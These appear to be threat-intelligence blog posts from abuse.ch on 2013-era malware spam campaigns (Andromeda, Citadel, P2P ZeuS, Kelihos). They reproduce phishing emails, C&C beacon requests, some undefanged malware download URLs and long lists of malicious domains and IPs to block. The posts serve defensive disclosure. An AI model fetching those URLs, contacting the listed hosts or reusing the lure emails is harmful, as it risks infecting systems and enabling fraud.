abuse.ch

Fake hotel.de Booking Emails Hitting CH and DE

admin — Mon, 18 Mar 2013 09:47:07 +0000

Around 09:00 UTC, the cutwail spam botnet started to send out a new spam campaign targeting Swiss and German internet users. This spam campaign seems to be linked to the fake Swisscom and T-Mobile emails we have seen recently.

This time, the criminals send out fake hotel.de booking emails that looks like this:

From: “hotel.de” Reserv@hotel.de
To: spamtrap
Subject: Hotel.de Reservierung [98588048], Mon, 18 Mar 2013 17:23:24 +0800

Reservierung

Buchungsnummer: SN2699862
Buchungsdatum: Mon, 18 Mar 2013 17:23:24 +0800
Mehr Details in der beigefugten Datei

Anreise: 23.03.2013 Anzahl Nächte: 1
Abreise: 24.03.2013 Gesamtanzahl Personen: 1
Preis: 73,89 EUR
Der Gesamtpreis beinhaltet 3,93 EUR Steuern und Abgaben.

Hinweis: Diese Buchung ist per Bankkarte gesichert.
——————————————————————————–
Mit freundlichen grüßen
Ihr hotel.de/hotel.info-Team
hotel.de AG – www.hotel.de – www.hotel.info

The email contains an attachment called HotelReservierung8266035.pdf.zip that contains an Windows executable:

Filename: HotelReservierung8300754911.PDF.exe
Filesize: 124’287 bytes
MD5 hash: 9b81080a24495269caf15637fe3908c1
VirSCAN.org: 2 / 37

The file contains the same dropped that we have already seen in the recent Swisscom / T-Mobile spam mails, called Andromeda (also known as Gamarue). Once the file gets executed, the Trojan installs itself on the system and tries to connect to the following botnet command&control server (C&C):

POST /wp-rss2.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Connection: close
User-Agent: Mozilla/4.0
Host: kitro.pl
Content-Length: 80
Cache-Control: no-cache
Pragma: no-cache

*encrypted-data*

The domain name kitro.pl is registered through a in Poland based domain registrar called “Domain Silver Inc”:

DOMAIN NAME: kitro.pl
registrant type: individual
nameservers: ns1.nextbookz.com.
ns1.menorca24.com.
created: 2012.12.10 15:11:20
last modified: 2013.03.14 07:15:00
renewal date: 2013.12.10 15:11:20

no option

dnssec: Unsigned
TECHNICAL CONTACT: data restricted

REGISTRAR:
Domain Silver Inc.
1st Floor, Sham-Peng-Tong
Plaza Building, Victoria, Mahe
Seychelles
e-mail: support@domainsilver.pl
tel.: +1.3236524343

Based on the geo location of the victim, the Trojan drops additional malware like Torpig/Mebroot, Citadel or Feodo/Cridex.

Since the domain name hotel.de published an SPF record and the sending IP addresses are already listed on Spamhaus ZEN, the impact caused by this threat should be limited (unless you use a poorly configured spam filter).

As usual, I recommend you to block the following domain names and IP addresses which are associated with this threat on your network edge / web gateway:

menorca24.com
nextbookz.com
ophia.ru
kitro.pl
177.71.251.208
163.32.75.26
2.229.105.130
130.255.190.43

Fake Swisscom And T-Mobile Emails Hitting CH and DE

admin — Mon, 11 Mar 2013 20:41:53 +0000

This morning I’ve spotted two spam campaigns hitting German and Swiss internet users, by abusing the name and reputation of two well known players in the telephone sector: Swisscom (CH) and T-Mobile (DE).

Below is a spam sample that has been sent out by the Cutwail spam botnet this morning hitting Swiss internet users:

From: noreply@swisscom.ch
To: spamtrap
Subject: MMS

Description: Swiss Telecom

Telefonnummer +41*random-number*

Wenn der Adressat ein MMS nicht empfangen kann (weil er kein MMS-fähiges Handy hat oder wenn mit seinem Netzanbieter keine MMS ausgetauscht werden können) erhält er ein SMS mit einer MMS-ID. Auf der Website von Swisscom kann er das MMS mit dieser MMS-ID abrufen.

It’s an HTML email that embeds the Swisscom-Logo:

The email is written in German and says that if the recipient gets an MMS and his mobile phone isn’t able to display MMS or his network provider doesn’t support it, he will get an SMS with an MMS-ID. The receipient can enter this MMS-ID on the Swisscom website to view the MMS he just has received. If you Google that text you will notice that the criminals just copied that text from Swisscom’s official website:

http://www.swisscom.ch/de/privatkunden/hilfe/loesung/dienste-im-ausland-nutzen.html

The spam email has a ZIP-Archive (MMSXXXXX.zip) attached that contains a Windows executable (.exe) infected with Andromeda (also known as Gamarue):

Filename: MMS-XXXXXXXX.JPEG.exe
Filesize: 30’724 bytes
MD5 hash: 2c1a7509b389858310ffbc72ee64d501
Virustotal: 20 / 45

Once the recipient executes the Windows executable, the Trojan installs itself into the profile of All Users:

C:\Documents and Settings\All Users\dxalrjtj.exe

Andromeda/Gamarue uses some anti-VM mechanism to make sure that it only gets executed on a physical system. As soon as the Trojan infected the victims machine, it starts to communicate with the botnet C&C using the HTTP protocol:

POST /soap.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Connection: close
User-Agent: Mozilla/4.0
Host: ophia.ru
Content-Length: 80
Cache-Control: no-cache
Pragma: no-cache

*encrypted-data*

The botnet C&C server is located at ophia.ru which is registered through a Russian based domain registrar called “NAUNET”:

domain: OPHIA.RU
nserver: ns1.menorca24.com.
nserver: ns1.nextbookz.com.
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
registrar: NAUNET-REG-RIPN
admin-contact: https://client.naunet.ru/c/whoiscontact
created: 2012.12.10
paid-till: 2013.12.10
free-date: 2014.01.10
source: TCI

The domain name has several A records:

59.167.122.56 [ppp59-167-122-56.static.internode.on.net.]
101.99.23.176 [static.cmcti.vn.]
2.229.105.130 [2-229-105-130.ip196.fastwebnet.it.]
177.71.251.208 [ec2-177-71-251-208.sa-east-1.compute.amazonaws.com.]
185.12.5.106 [host-106-5-12-185.cloudsigma.com.]

Googling for the mentioned botnet C&C domain will reveal an interesting forum post on Trojaner-board.de. Obviously the criminals sent out a similar spam campaign today targeting German internet users, by abuse T-Mobile’s brand. The attackers used a different subject line and email body, but sent out the same malicious file (MD5 hash: 2c1a7509b389858310ffbc72ee64d501).

Fortunately, I’ve some good news for you: All these spam emails I’ve seen hitting my spamtraps today have been blocked by Spamhaus ZEN. So if your spamfilter is checking the sending IP address of an email against ZEN, most of these spam emails should have been blocked. Secondly, Swisscom did their homework and already published an SPF record for their domain name swisscom.ch a long time ago:

$ dig +short swisscom.ch TXT
“v=spf1 ip4:193.222.81.0/24 -all”

If your spamfilter is configured to check the SPF record of the sending domain, all these spam messages should have been rejected on your email gateway.

To mitigate this threat, you should ensure that you:

Check incoming emails against Spamhaus ZEN
Enable SPF checking on your spamfilter / email gateway
Block the botnet C&C domain name and the associated IP addresses (see below)
configure your clients to show file extensions for known file types (MMS-XXX.jpg.exe)

Associated domain names / IP addresses to block on your firewall / gateway:

130.255.190.43
59.167.122.56
101.99.23.176
2.229.105.130
177.71.251.208
185.12.5.106
advstar.com
alfila.net
arbeitdeutschland.com
arteexotica.net
bestjobcousa.com
bestjobscousa.com
careerabroadinfo.com
dacortaorlando.net
encounterkaspe.pl
establishingwi.su
eyesee-lazere.pl
fearedembracin.su
flavoured.pl
followupdebate.pl
garbagethiever.su
gellax.com
goldenpick.net
greecexpatjobs.com
hemon.pl
hotlane.net
htimemanagemen.su
jobbcanada.com
jobbinamsterdam.com
lombrisa.com
machinelikeleb.su
menorca24.com
mickmalones.com
monitoreddream.su
moteasingwold.net
neo-conned.net
netfest.pl
nextbookz.com
ophia.ru
oracleutilities.net
portugaleuropa.com
purchasingdril.su
simsapprentice.pl
sppleiconicana.su
srichkeylogger.su
technojobse.com
theirspentawar.pl
thelocalsejobs.com
three-property.net
turismingeorgia.net
unpackcenterpi.su
upkeepfilesyst.su
westors.com
youpolandjobs.com
yourcareerbuilders.com

Malware Spreads Through Malicious PDF Attachments

admin — Mon, 04 Mar 2013 20:56:17 +0000

When I blog about spam campaigns that are spreading malware, the malware is usually being spread through a malicious email attachment. Mostly, the attachment is a ZIP-Archive that contains the Trojan as executable file (file extension .exe). This is an old schema used by many cybercriminals for years but I have to admit that they are still quite successful in infecting new victims. To mitigate such threats, many organisations block or reject any email that contains an executable file (.exe) or an ZIP-Archive with an executable on their email gateway / spam filter. You do so as well? You think you are safe? Unfortunately, I do have some bad news for you.

Today I was quite surprised when I got the following spam email on one of my spamtraps:

From: agassi92@gmx.de
To: spamtrap
Subject: =?utf-8?q?Abmahnung f=C3=BCr firstname lastname 04.03.2013?=
Date: Mon, 4 Mar 2013 16:48:21 GMT

Sehr geehrter Kunde X X,

im heutigen Gesch=C3=A4ftsleben hat man =E2=80=9Eviel um die Ohren=E2=80=9C=
und muss an eine Menge Dinge gleichzeitig denken. Dass einem dabei mal etw=
as entgehen kann ist ganz nat=C3=BCrlich. Soeben konnte unsere Buchhaltung =
bez=C3=BCglich der angeh=C3=A4ngten Rechnung noch keinen Zahlungseingang er=
sehen.=20

Datum: 13.01.2013 best=C3=A4tigt von
Offene Rechnung: 448,75 Euro
Bestellnummer: 100687844
Mahnkosten: 4,00 Euro

Sofern Ihrer Aufmerksamkeit unsere Rechnung entgangen ist, haben wir Ihnen =
eine Kopie der Rechnung beigef=C3=BCgt. Wir bitten Sie, die Zahlung nachzuh=
olen und sehen dem Eingang Ihrer Zahlung bis zum 04.03.2013 entgegen. Falls=
Sie den genannten Termin nicht einhalten, werden wir Ihnen weitere Verzugs=
zinsen und Mahnkosten berechnen.

Sollte der angemahnte Betrag nicht fristgerecht bei uns gebucht werden, wer=
den wir ohne weitere Schreiben unseren Rechtsanwalt mit der Klageerhebung b=
eauftragen.=20

Mit bestem Dank f=C3=BCr Ihr Vertrauen in Conrad Electronic Dominik Krause

One of the things that I noticed immediately is that the email has a clean language which is quite uncommon for such spam campaigns (it is written in German and hence most likely targeting German speaking countries exclusively). Another thing that I noticed is that the email didn’t got blocked by the my spamfilter. While looking into it, I noticed that the spam mail had a very low spam score which is based on the fact that the sending IP address isn’t blacklisted on any blacklist (DNSBL). I’m not surprised because the sending IP address is actually one of GMX’s outbound email gateways:

Received: from mout-xforward.gmx.net (mout-xforward.gmx.net [82.165.159.41])
by spamtrap (X) with ESMTP id X
for spamtrap; Mon, 4 Mar 2013 16:49:03 +0000 (UTC)

For those who don’t know GMX: It’s a large free email service provider in Germany owned by 1&1. So you shouldn’t block their outbound email servers. What the criminals obviously did is using stolen SMTP credentials to send out their spam campaign.

The spam email contains a malicious PDF attachment using the first- and lastname of the recipient (victim):

Filename: Mahnung X X.pdf
File size: 9’514 bytes
Virustotal: 1 / 46

The AV detection rate is very poor, only one out of 46 AV vendors currently provides a detection against this threat (Microsoft – Exploit:Win32/CVE-2010-0188). The PDF exploits a well known vulnerability in Adobe Reader that allows remote code execution. The vulnerability was already addressed by Adobe in 2010.

If the Adobe version installed on the victims computer isn’t up to date, the malicious PDF will exploit CVE-2010-0188 and downloads the malware itself from seodirect-proxy.com:

URL: http://seodirect-proxy.com/adobe-update.exe
Filename: adobe-update.exe
Filesize: 73’728 bytes
Virustotal: 3 / 46

Unfortunately, most AV-vendors fail on this file as well. Only 3 AV-vendors currently provides a detection for it (well done ESET, Kasperksy and Malwarebytes). The file is temporary being stored in the following location:

C:\Document and Settings\USERNAME\Local Settings\Temp\wpbt0.dll

Afterwards the malware installs itself into a random directory with a random filename in the victims user profile, for example:

C:\Document and Settings\USERNAME\Hyrrayn\uisdoxtmjkl.exe (same file as wpbt0.dll)
C:\Document and Settings\USERNAME\Local Settings\Temp\otnhhyskui.pre (same file as wpbt0.dll)

Once the victims computer has been successfully infected, the malware contacts a botnet C&C hosted at zeouk-gt.com:

GET /typo3.php?ltype=ld&ccr=1&id=XXX&stat=0&ver=XXX&loc=XXX&os=XXX HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: zeouk-gt.com
Connection: Keep-Alive
Cache-Control: no-cache

The User-Agent string seems to be hardcoded in the binary and is using an exotic (and I believe no longer used) version of Microsoft Internet Explorer (MSIE 6.0b).

To mitigate this threat, I recommend you to:

Create an IDS rule that spots the user-agent used by this malware
Patch Adobe Reader
Block the associated malware distribution site / botnet C&C (see list below)

Malicious domain names / IP addresses used or related in this malware campaign (I highly recommend you to block those):

bnamecorni.com
flash-mini-sp3.com
kcrio-oum.com
mydkarsy.com
namelesscorn.net
openwebspace-apo.com
porkystory.net
proscitomash.com
seldomname.com
senesamj.com
seodirect-proxy.com
sort-storymv.com
uawxaeneh.com
usergateproxy.net
zeouk-gt.com
101.99.23.176
54.248.20.255
151.155.24.150
173.231.39.70

Delta Airlines Spam Lead To Citadel

admin — Mon, 18 Feb 2013 21:45:28 +0000

Today I’ve seen the following spam campaign hitting my spamtraps:

From: Delta Airlines < tickets@delta.com >
To:
Subject: Your Order#XXXXXX – APPROVED

Dear Customer,

Your credit card has been successfully processed.

FLIGHT NUMBER DT628190172US
ELECTRONIC 628190172
DATE & TIME / FEB 19, 2013, 12:45 AM
ARRIVING / Washington
TOTAL PRICE / 429.33 USD

Please download and print your ticket from the following URL:

http://iemvirtual.com.ar/my/pdf_delta_ticket.zip

For more information regarding your order, contact us by visiting :

https://www.delta.com/content/www/en_US/support/talk-to-us.html

Thank you
Delta Airlines.

The hyperlink referenced in this spam campaign leads to a hijacked website that serves a ZIP archive that contains a malicious screen saver (.scr) file:

URL: http://iemvirtual.com.ar/my/pdf_delta_ticket.zip

Filename: pdf_delta_ticket.scr (pdf_delta_ticket.zip)
File size: 291’840 bytes
MD5 hash: f66358bf351e6038b9a75b2f0f01860d
Virustotal: 11 / 44

The file pdf_delta_ticket.scr contains Citadel, a derivative of the famous ZeuS banking trojan. Unlike other binaries I’ve seen being spammed recently, this binary seems to be packed using a packer that is completely VM-aware – hence it will only run on a native machine.

Once infected, the infected computer tries to contact several Citadel C&C servers (botnet controllers). This Citadel campaign is using various C&C servers, all located in the same subnet:

Citadel config/binary URLs:

hXXp://91.243.115.83/caca/flogin.php
hXXp://91.243.115.84/caca/flogin.php
hXXp://91.243.115.85/caca/flogin.php
hXXp://91.243.115.86/caca/flogin.php

Citadel dropzones:

hXXp://91.243.115.83/caca/glogout.php
hXXp://91.243.115.84/caca/glogout.php
hXXp://91.243.115.85/caca/glogout.php
hXXp://91.243.115.86/caca/glogout.php

They are already listed on ZeuS Tracker:
https://zeustracker.abuse.ch/monitor.php?as=199079

As far as I can see, this Citadel campaign currently attacks BMO Financial Group, RBC Royal Bank and CIBC. All mentioned C&C IP addresses are within the same subnet that belongs to a (likely fake) internet service provider called “Aztec ltd”:

inetnum: 91.243.115.0 – 91.243.115.255
netname: ATCTEK-NET
descr: Aztec ltd.
country: RU
org: ORG-Al253-RIPE
admin-c: MRA85-RIPE
tech-c: MRA85-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-END-MNT
mnt-lower: RIPE-NCC-END-MNT
mnt-by: MNT-ATCTEK
mnt-routes: MNT-ATCTEK
mnt-domains: MNT-ATCTEK
source: RIPE # Filtered

organisation: ORG-Al253-RIPE
org-name: Aztec ltd.
org-type: OTHER
address: Russia, Saint-Petersburg, Gangytskaya str., 14.
remarks: ***************************************
remarks: in case of ABUSE or active issues please contact us
remarks: abuse/administrative email: abuses@aztec-ltd.ru
remarks: ***************************************
remarks: All other notifications to: support@aztec-ltd.ru
abuse-mailbox: abuses@aztec-ltd.ru
mnt-ref: MNT-ATCTEK
mnt-by: MNT-ATCTEK
source: RIPE # Filtered

person: Mamarasylov Rystam Aleksandrovich
address: Russia, Saint-Petersburg, Gangytskaya str., 14.
phone: +7-901-903-43-76
nic-hdl: MRA85-RIPE
mnt-by: MNT-ATCTEK
source: RIPE # Filtered

% Information related to ’91.243.115.0/24AS199079′

route: 91.243.115.0/24
descr: AZCTEK route
origin: AS199079
mnt-by: MNT-ATCTEK
source: RIPE # Filtered

When you visit their website (www.aztec-ltd.ru), you will just see an output of phpinfo(). Quite suspect for an internet service provider, isn’t it? Aztec isn’t new to me, I’ve seen a lot of Citadel C&C and webinject servers hosted there recently, used to commit financial fraud (ebanking fraud).

Taking a look at the global BGP routing table, I see two upstream providers providing IP transit to Aztec:

Source: http://bgp.he.net/AS199079#_graph4

Their first upstream is AS34109 (CB3ROB Ltd, Germany). CB3ROB gets its upstream connectivity from AS6453 (Tata Communications, India) and AS12327 (idear4business, Great Britain). Their second upstream is AS56598 (KartLand Ltd, Russia). KartLand gets its upstream connectivity from AS29226 (CJSC Mastertel, Russia). Most of these network names sound familiar to botnet researchers. AS199079 (AZCTEK) and AS56598 (KartLand) are obviously operated by cybercriminals. I recommend you to drop any packets from / to those networks at your network’s edge. AS34109 (CB3ROB) and AS12327 (idear4business) have shady backgrounds. I’ve seen various botnet C&Cs hosted in their IP space. If you run your own network, you might want to look into traffic from / to these AS numbers as well

AS199079 ATCTEK-AS Aztec ltd. (likely rogue)
91.243.115.0/24

AS56598 ASKARTLAND KartLand Ltd. (likely rogue)
91.213.126.0/24

AS34109 CB3ROB Ltd. & Co. KG (suspect)
84.22.96.0/19
91.209.12.0/24
205.189.71.0/24
205.189.72.0/23

AS12327 IDEAR4BUSINESS-INTERNATIONAL-LTD (suspect)
31.222.200.0/21
37.148.218.0/23
37.148.218.0/24
37.148.219.0/24
37.148.220.0/22
195.191.102.0/23
195.191.102.0/24
195.191.103.0/24

Such spam campaigns are not uncommon; I see 1-3 of those on a daily basis. However, what is special with this specific campaign is that is wasn’t sent out by a (spam) botnet (usually Cutwail, Festi or Kelhios), but through compromised email servers. So far, I’ve seen roughly 30 sending SMTP servers (ab)used in this spam campaign:

46.4.194.114 server1.doremomedia.ch
85.88.3.65 uhhosting3065.united-hoster.com
190.7.31.232 n2.gigared.com
212.40.5.52 smtp.datacomm.ch
212.40.5.82 fallback.datacomm.ch
213.143.3.60 webform.pipeten.co.uk
61.19.246.34 cat67.thaihostserver.com
62.67.240.20 relayn.netpilot.net
66.212.18.209 maranata.xtnet.com.ar
68.233.254.111 open2.snappyservers.com
69.25.11.244 mia244.sinspam.com
69.25.11.246 mia246.sinspam.com
69.25.11.248 mia248.sinspam.com
69.25.11.249 mia249.sinspam.com
69.25.11.250 mia250.sinspam.com
69.25.11.251 mia251.sinspam.com
69.25.11.252 mia252.sinspam.com
69.25.11.253 mia253.sinspam.com
74.63.154.221 moab.cloud.viawest.net
81.169.146.213 cg-p07-ob.rzone.de
81.169.146.214 cg-p07-ob.rzone.de
85.92.140.199 mail.antivirus.flexwebhosting.nl
85.114.137.70 web12.vsmedia-europe.com
86.96.226.149 domail2.emirates.net.ae
94.23.52.28 ks206474.kimsufi.com
94.231.109.58 smtp6.zitcom.dk
94.231.109.212 smtp7.zitcom.dk
173.236.47.22 node04.serverdeals.org
176.56.224.34 web-srv01.directadmin.alb.nl.weservit.nl
178.20.153.124 s-relay.freehost.com.ua
200.29.67.115 envio.publimail.cl
200.181.19.35 golias.apis.com.br
202.57.191.199 host199.porar.com
212.79.240.101 mail.threvon.nl
213.246.62.75 heb62075.ikoula.com
216.223.130.74 server74.ilap.com

Since the criminals are using compromised email servers, many DNSBLs are failing to catch those because most of them are focused on botnet or snowshoe spam. Hence the criminals can be sure that most of these spam mails are getting delivered to the victims mailbox.

You can protect yourself / your network from this threat by doing a few simple things:

Check SPF and DKIM on your email gateway*
Drop packets from/to the networks mentioned before
Use Windows 7 AppLocker

* delta.com does have an SPF record that defines the permitted senders for this specific domain name

Dutch Spam Campaign Hits Switzerland With P2P ZeuS

admin — Tue, 22 Jan 2013 17:59:20 +0000

Weird things are going on here in Switzerland. Today I’ve seen a spam campaign sent out by the Cutwail Spambot (on of the biggest spam botnets in the world), hitting Switzerland with the P2P version of ZeuS (aka P2P ZeuS aka ZeuSv3 aka Gameover ZeuS). The spam email looks like this:

From: reportbank@ag.ch
Subject: Re: onjuist ingevulde NATXXXX belastingformulier

Helaas is u op de hoogte dat je hebt fouten gemaakt bij het invullen van de laatste belastingformulier applicatie (ID: XXXXX).
vindt u het advies van onze fiscalisten Op deze link
( 1 minuut Wacht tot rapport zal laden)

Wij vragen u om corrigeer de fouten en bestand de herziene aangifte aan uw lokale belastingkantoor zo snel mogelijk.

Kanton Aargau
XXX XXX
Sachbearbeiterin Wehrpflichtersatzverwaltung
Departement Gesundheit und Soziales
Abteilung Militär und Bevölkerungsschutz
Rohrerstrasse 7, Postfach, 3352 Aarau
Tel.: +41 (0)62 362 XX XX
Fax: +41 (0)62 365 XX XX

What is weird with this spam campaign is the fact that it imitates a social department of a Swiss canton called Aargau (German), but the text in the email is written in Dutch. It might be hard to believe, but most Swiss citizens don’t speak Dutch at all…

Additionally, I’ve seen that Cutwail is sending out this spam campaign to non-CH mailboxes as well (.net, .com etc.). So it is not yet clear whether the intend of the criminals behind this malware campaign is to hit Swiss citizens or not (I don’t think that any foreign citizens knows the canton Aargau…).

The spam email contains a hyperlink to a hijacked website, for example:

hXXp://robfama.com/Kompetenzzentrum.htm

The page looks like this:

For a normal visitor the page doesn’t look suspect at all, its a copy of the official web page of the canton Aargau (swiss canton). However, if you take a closer look at the html source of the advertised URL you will notice malicious Java script code which will cause that the visitors web browser will load a content from foreign URL hosted in Korea:

hXXp://africanbeat.net/detects/urgent.php

africanbeat.net points to 222.238.109.66

[ Network Information ]
IPv4 Address : 222.232.0.0 – 222.239.255.255 (/13)
Service Name : broadNnet
Organization Name : SK Broadband Co Ltd
Organization ID : ORG3930
Address : 267, Seoul Namdaemunno 5(o)-ga Jung-gu SK NamsanGreen Bldg.
Zip Code : 100-711
Registration Date : 20040402

The mentioned website (africanbeat.net) is likely operated by cybercriminals and hosting a exploit kit called “Blackhole”. Blackhole is able to exploit various (known) vulnerabilities in the visitors web browser (eg. Internet Explorer or Firefox) but as well as in 3rd party browser plugins like Adobe Flash, Adobe Reader and Sun Java. If the software installed on the visitors computer is not fully patched, blackhole will exploit a vulnerability and will use it to install an ebanking Trojan called P2P ZeuS.

Since P2P ZeuS is not using any centralized (botnet) infrastructure, there is no central botnet C&C domain/ip you could block on your company’s gateway. However, P2P ZeuS is using P2P functionality, communicating with other infected bots around the globe using a high TCP/UDP port. In fact you can mitigate this threat by blocking any outgoing TCP and UDP port higher than 1024 on your firewall (as a side note: you should restrict outgoing traffic on your firewall anyway).

Additionally, I recommend everyone to block the following domain names and IP address at the network edge:

222.238.109.66 (Blackhole Exploit Kit hosting)
africanbeat.net (Blackhole Exploit Kit hosting)
63.143.53.180 (Malware DNS server)

*** Further reading ****

A follow me on Twitter: https://twitter.com/abuse_ch

A Quick Update On Spambot Kelihos

admin — Mon, 10 Dec 2012 07:08:08 +0000

In March 2012 I blogged about Kelihos, a Spambot that was shut down in September 2011 by Microsoft, but came back in January 2012.

Various security researchers believe that Kelihos (also known Hlux) is the replacement of the famous Storm Worm, which was active in 2007 and replaced by Waledac in 2009. Today I asked myself: What kind of evolution did Kelihos have during this year, so I decided to have a quick look at recent Kelihos binaries and compare their behaviour with the behaviour of the binaries I saw back in March 2012.

Here is a quick overview:

	Kelihos March’ 12	Kelihos December’ 12
Using (double) FastFlux domains to spread Kelihos:	Yes	Yes
(ab)used TLD for malware distribution:	.eu	.ru
Sponsoring registrar for nameserver domains:	INTERNET.BS	INTERNET.BS
Capability to spread via removable drives:	No	Yes
Using P2P network:	Yes	Yes

Infecting removable drives
So, what has changed? The first thing that pops up is the fact that Kelihos now has the capability to spread via removable drives, like USB sticks. The Kelihos gang implemented this feature on 2012-10-10 (what a nice date to push an update for Kelihos!).

Once a Kelihos infection binary is executed on the victims computer, it writes a temporary file to C:\WINDOWS\Temp:

C:\WINDOWS\Temp\temp12.exe

The naming schema used by Kelihos seems to be temp[1-9]{2}.exe. This file then tries to get an updated version of Kelihos by calling home to a .ru domain that is double FastFlux hosted. Once the update is done, temp12.exe will start to infect removable drives that are attached to the victims computer, most likely using CVE-2010-2568, which was first used in Stuxnet, and later on copied by various other malware:

Origin process	Affected file
C:\WINDOWS\Temp\temp12.exe	\Device\SanDisk0\sony.exe
C:\WINDOWS\Temp\temp12.exe	\Device\SanDisk0\Shortcut to Sony.lnk

Switching from .eu to .ru
Back in March 2012, Kelihos used a huge list of different domain names to spread itself and to provide fresh binaries (bot updates) to the botnet. In summer 2012 the Kelihos gang switched from TLD .eu to TLD .ru:

abaxhad.ru
adnedat.ru
adtesok.ru
aqzepylu.ru
asmukuf.ru
awewsip.ru
bipulte.ru
biwuvba.ru
bopwyeb.ru
bowbaiv.ru
bycmolhy.ru
bygotbys.ru
byjlegta.ru
byvbymy.ru
caqxaro.ru
citsibe.ru
cylqiduh.ru
dalwoza.ru
darabub.ru
deafesqy.ru
dehjujuq.ru
dinymak.ru
dohwapih.ru
doxilik.ru
egnisje.ru
estesgo.ru
evdyvaz.ru
fetucxo.ru
fevnotow.ru
fidedhah.ru
fixavpu.ru
gazuzoz.ru
gedopan.ru
gijevsog.ru
ginnyjyb.ru
golhysux.ru
gubahvi.ru
gywilhof.ru
hahsekju.ru
haponeg.ru
hedybih.ru
heztymut.ru
hitakat.ru
huquqxov.ru
ihmytog.ru
ikevzaq.ru
imgohut.ru
ipdehas.ru
irhegre.ru
irojvuqu.ru
ivkikcop.ru
ivnuvuk.ru
iwvahin.ru
izxirfy.ru
jaibzup.ru
jamwazer.ru
jebtelyx.ru
jedytlu.ru
jodkymy.ru
jokenqi.ru
jykyvca.ru
jymeegom.ru
jytorqu.ru
jyvvozoz.ru
kejejib.ru
kubtyhuz.ru
kuirfufo.ru
kycufvy.ru
leqgugom.ru
lopoqyv.ru
luditla.ru
lufsekim.ru
lupylzum.ru
mabuhos.ru
mosjinme.ru
muhipew.ru
muwosiv.ru
muzupdyg.ru
neluzjiv.ru
niliqrix.ru
nobzekyx.ru
ocgaextu.ru
ogdowkys.ru
ojpaxlam.ru
oqjogxi.ru
oqlapjim.ru
osmuryf.ru
otgeguuz.ru
otpipug.ru
otxolpow.ru
ovquqaip.ru
pagubev.ru
pawahav.ru
pedugtap.ru
pegyrgun.ru
pevhyvys.ru
pogwytfy.ru
pynxomoj.ru
pyykxug.ru
qaijroke.ru
qiquzcy.ru
quohdit.ru
racadpuh.ru
rebfelqi.ru
rekvyfo.ru
rifirac.ru
risytfa.ru
ritrios.ru
rizsebym.ru
rujfeag.ru
ruxymqic.ru
rybuhoq.ru
rykafeh.ru
saxyjuw.ru
sesuhror.ru
sexjereh.ru
sihemuj.ru
sittanyg.ru
siwebheb.ru
sohaxim.ru
soqvaqo.ru
sukbewli.ru
sutfasof.ru
sutimjy.ru
tahfifak.ru
taixcih.ru
tecviqir.ru
tikoqox.ru
tiwciwux.ru
tozfyma.ru
turiwil.ru
ucelgos.ru
udxowub.ru
udzycaf.ru
uggifym.ru
uhduxic.ru
uhzubvo.ru
umpefan.ru
uqlahaf.ru
uwfekfyj.ru
uwfubpeb.ru
uxfokur.ru
uxosgik.ru
veuwhyz.ru
vijsixem.ru
votqygiq.ru
vunjuet.ru
vuohsub.ru
wapifnuc.ru
warkafoc.ru
wefecfo.ru
wetifjam.ru
wibveces.ru
wyjenqo.ru
xenacoz.ru
xikmonej.ru
xofsimi.ru
xogitaj.ru
xomoqol.ru
ybsahov.ru
ydabxag.ru
ykocnar.ru
ynjaprur.ru
ynkicyr.ru
yxyqwiz.ru
yzsabuq.ru
zaefofin.ru
zidamuk.ru
zupivzed.ru
zuqijcel.ru
zylhomu.ru

As outlined before, these domain names are being used to spread Kelihos. Malware binaries are located at various places like calc.exe and rasta01.exe:

http://*random-domain-from-the-list-above*/calc.exe

http://*random-domain-from-the-list-above*/rasta01.exe

All mentioned domain names are registered through the same Russian based registrar called REGGI-RU:

domain: GYWILHOF.RU
nserver: ns1.biocruc.com.
nserver: ns2.biocruc.com.
nserver: ns3.biocruc.com.
nserver: ns4.systeat.com.
nserver: ns5.systeat.com.
nserver: ns6.systeat.com.
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
registrar: REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created: 2012.11.01
paid-till: 2013.11.01
free-date: 2013.12.02
source: TCI

… while the domain name itself is using double FastFlux (A record + NS record hosted on a FastFlux botnet):

A records for pevhyvys.ru:
-> 67.177.139.18 [c-67-177-139-18.hsd1.mi.comcast.net.]

Delegated nameservers for pevhyvys.ru:
-> ns2.biocruc.com. -> 114.43.101.84 [114-43-101-84.dynamic.hinet.net.]
-> ns4.systeat.com. -> 67.177.139.18 [c-67-177-139-18.hsd1.mi.comcast.net.]
-> ns6.systeat.com. -> 71.205.242.35 [c-71-205-242-35.hsd1.mi.comcast.net.]
-> ns3.biocruc.com. -> 50.130.45.53 [c-50-130-45-53.hsd1.ms.comcast.net.]
-> ns5.systeat.com. -> 69.132.69.185 [cpe-069-132-069-185.carolina.res.rr.com.]

What surprisingly haven’t changed is the fact that the Kelihos gang is still using INTERNET.BS (a domain name registrar located in the Bahamas) to register domains names of the name servers that are being used to provide DNS resolution to the malicious .ru domains:

Domain Name: BIOCRUC.COM
Registrar: INTERNET.BS CORP.
Whois Server: whois.internet.bs
Referral URL: http://www.internet.bs
Name Server: NS1.BIOCRUC.COM
Name Server: NS2.BIOCRUC.COM
Name Server: NS3.BIOCRUC.COM
Name Server: NS4.BIOCRUC.COM
Name Server: NS5.BIOCRUC.COM
Name Server: NS6.BIOCRUC.COM
Status: clientTransferProhibited
Updated Date: 14-aug-2012
Creation Date: 15-jul-2012
Expiration Date: 15-jul-2013

The rise of Kelihos
If we take a look at the global spam statistics today, the Kelihos gang has managed to get one of the biggest spam botnets world wide with 100k – 150k unique spamming IP addresses per day. In fact, Kelihos is as active as the famous Festi and Cutwail botnets, which have more or less the same number of spamming IP addresses per day.

But what makes Kelihos so successful? First of all, Kelihos is not easy to shut down since it is using double FastFlux for their malware distribution domains and rely on P2P techniques for botnet communication. So there is no central botnet infrastructure. By adding the possibility to spread via removable drives, Kelihos also has a very effective way to spread itself across networks and computers even without the need of a central (distribution) infrastructure. Last but not least, the infection binaries associated with Kelihos I’ve seen so far have a very poor AV detection rate.

For example:

hXXp://pevhyvys.ru/newavr3.exe

MD5: 19b4bb3dde20da3d6602165a25186a00
File size: 741.0 KB ( 758784 bytes )
File name: newavr3.exe
File type: Win32 EXE
